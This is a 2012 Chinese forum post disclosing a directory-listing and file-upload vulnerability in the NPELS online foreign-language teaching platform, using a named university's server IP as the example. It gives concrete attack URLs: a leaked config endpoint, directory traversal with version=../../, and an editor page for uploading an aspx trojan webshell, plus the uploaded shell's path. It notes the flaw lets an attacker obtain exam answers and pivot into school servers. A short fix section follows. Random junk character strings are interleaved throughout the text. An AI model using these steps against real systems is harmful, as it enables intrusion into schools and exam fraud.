找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2258|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
3 K# d( X% e7 E5 s: R2 P% M
' q, M" L9 ]# l' [% V; l详细说明:2 L9 I* J" @8 u/ h) F
, j7 W! {3 Q& U9 Q) }7 {
以南开大学的为例:
5 |/ n& K; e2 Z+ zhttp://222.30.60.3/NPELS, a/ q7 \9 S9 P; R" m
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址$ D# A# e3 Z# a6 s: E4 j1 k
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
  j8 Y0 Z. W. e/ z+ O* T7 y8 P<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
5 A7 [7 Q8 y- _2 [& s</setting>% W0 I3 O' C# }9 {7 O$ Y0 V) W  g' M
及版本号
( m& g& g/ I+ Q$ E9 c* G9 L<add key="TVersion" value="1, 0, 0, 2187">
" i3 f" y8 S& B+ d% A9 C</add>% f8 T( x% N: a8 m# v
直接访问, |) c: `8 o( q( t+ D
http://222.30.60.3/NPELS/CommonService.asmx* ?/ X! y0 y% ]- S6 X4 A$ _
使用GetTestClientFileList操作,直接 HTTP GET 列目录:/ ~" k; O, l: f3 z. _  {. V
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
# M8 g) ?( a4 H进一步列目录(返回的网页很大,可以直接 wget 下来)
7 |2 Q/ u6 B$ p( Whttp://222.30.60.3/NPELS/CommonS ... List?version=../../
  B+ G3 A- K; p4 ~3 z- i! U3 H
( ]& A( Q! }* Z5 Y3 e0 d' L4 d5 V发现7 W& g1 V+ X. U
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
" X/ m  O6 f6 i: E! k* e可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头6 d7 U. q( |  o. u- o
上传后继续列目录找到木马地址直接访问即可
3 J; L/ H* P' n5 A/ q( @& n8 f- ~) ] 8 G! {4 V( W, c4 l$ h& o
OOXX
  A- g4 A5 m' @+ X% E+ M
" y$ d& U/ r. Y. P0 Q6 Q% iGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法3 o3 `5 f$ X# c# F
漏洞证明:, W$ ], {) [7 ^* L- x2 `9 y

8 W1 Y+ Z& _6 f. J- \列目录:
* F. ^# b3 t5 E! k0 S; Rhttp://222.30.60.3/NPELS/CommonS ... List?version=../../$ l6 Z# F) u4 h3 [; m3 ~) @: C$ ?  n/ I
文件上传:0 d4 G: T& b" C) P: i8 X
http://222.30.60.3/npelsv/editor/editor.htm
' w4 P: [! `& r; f, Y * P8 o7 v& |5 `- p
上传木马:+ v, M* A" g) n7 {! g
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx0 i' `+ ^* u& ^1 B. h/ ~% q) c1 w  `8 l4 r
  N! _9 v1 e6 `8 }" A% Y) H
修复方案:
: l0 |: V% q$ \$ N' I1 z/ D好像考试系统必须使用 CommonService.asmx& o2 I! _+ |, l6 v; w
最好配置文件加密或者用别的方式不让它泄露出来
- l) ?: T: J# j0 T% U% w并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
+ g: A7 [+ \4 \. {4 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表